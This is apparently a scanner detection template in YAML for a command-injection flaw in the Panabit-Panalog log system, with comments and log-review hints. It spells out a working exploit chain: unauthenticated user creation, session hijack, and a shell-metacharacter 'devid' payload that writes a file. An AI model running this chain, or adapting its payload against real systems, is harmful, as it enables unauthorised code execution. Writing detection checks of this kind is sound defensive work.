漏洞描述
FOFA: app="Panabit-Panalog"
ZoomEye: app:"Panabit-Panalog"
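# Detection template for a command-injection flaw in the Panabit-Panalog log
# system. Four chained rules must all succeed (see the final `expression`):
#   r0  registers a throwaway user through /singleuser_action.php
#   r1  signs in as that user and captures the session cookie
#   r2  sends a `devid` value containing shell metacharacters
#   r3  confirms that the marker file named in r2 is now served
#
# Nesting restored: with every key at column 0 the document is a flat mapping
# with duplicate `request`/`expression`/`path` keys and empty block scalars.
#
# Operational caveat: this check changes state. A positive run leaves a user
# record (userId = randInt) and a file <randName>.php under /App/ on the
# target, and the template has no cleanup step, so both must be removed by
# hand afterwards. The file body is only 56 random lowercase letters.
#
# Log-review hints derived from the requests below: a POST to
# /singleuser_action.php with "operationType": "ADD_USER", followed by
# GET /singlelogin.php?userId=<5 digits> and GET /App/appiplist.php where
# `devid` contains `;` or `>`; on disk, unexpected six-letter .php files
# under /App/.
id: panabit-applist-rce

info:
  # NOTE(review): name and id say "applist.php", but r2 requests
  # /App/appiplist.php - confirm which spelling is the affected endpoint.
  name: Panabit-Panalog log system applist.php command execution
  author: zan8in
  severity: critical
  verified: true
  # Asset-search fingerprints for inventorying exposed instances.
  description: |-
    FOFA: app="Panabit-Panalog"
    ZoomEye: app:"Panabit-Panalog"
  tags: panabit,rce
  created: 2023/10/30

# Fresh random values on every run, so results from separate scans do not
# collide and the r3 marker cannot match by coincidence.
set:
  randInt: randomInt(10000, 99999)
  randName: randomLowercase(6)
  randBody: randomLowercase(56)

rules:
  # r0: user-sync call sent without any Cookie header; a 200 carrying the
  # OK JSON means the account was accepted with no session presented.
  r0:
    request:
      method: POST
      path: /singleuser_action.php
      headers:
        Content-Type: application/json
      body: |
        {"syncInfo": { "user": { "userId": "{{randInt}}", "userName": "{{randName}}", "employeeId": "119", "departmentId": "119", "departmentName": "119", "coporationId": "119", "corporationName": "119", "userSex": "1", "userDuty": "119", "userBirthday": "119", "userPost": "119", "userPostCode": "119", "userAlias": "119", "userRank": "119", "userPhone": "119", "userHomeAddress": "119", "userMobilePhone": "119", "userMailAddress": "119", "userMSN": "119", "userNt": "119", "userCA": "119", "userPwd": "119", "userClass": "119", "parentId": "119", "bxlx": "119" },"operationType": "ADD_USER" } }
    expression: |
      response.status == 200 &&
      response.body.bcontains(b"{\"yn\":\"yes\",\"str\":\"OK\"}")

  # r1: single sign-on by userId alone; expects a 302 that sets PHPSESSID.
  r1:
    request:
      method: GET
      path: /singlelogin.php?userId={{randInt}}
    expression: response.status == 302 && response.headers["set-cookie"].icontains("PHPSESSID=")
    output:
      # `phpsessid` holds only the session id (used by r3).
      search: '"PHPSESSID=(?P<phpsessid>.*?);".bsubmatch(response.raw_header)'
      phpsessid: search["phpsessid"]
      # `cookie` holds the rest of the Set-Cookie line as sent (used by r2);
      # presumably this includes cookie attributes - verify against a capture.
      search1: '"Set-Cookie: (?P<cookie>.+)".bsubmatch(response.raw_header)'
      cookie: search1["cookie"]

  # r2: authenticated request whose `devid` parameter carries the marker
  # write. Status 200 alone proves nothing here; r3 is the confirmation.
  r2:
    request:
      method: GET
      path: "/App/appiplist.php?devid=;echo\"{{randBody}}\">{{randName}}.php;"
      headers:
        Cookie: "{{cookie}}"
    expression: response.status == 200

  # r3: fetch the marker file; matching the 56-character random body keeps
  # false positives from generic 200 pages negligible.
  r3:
    request:
      method: GET
      path: /App/{{randName}}.php
      headers:
        Cookie: PHPSESSID={{phpsessid}}
    expression: response.status == 200 && response.body.bcontains(bytes(randBody))

# Report a finding only when every stage succeeded, in order.
expression: r0() && r1() && r2() && r3()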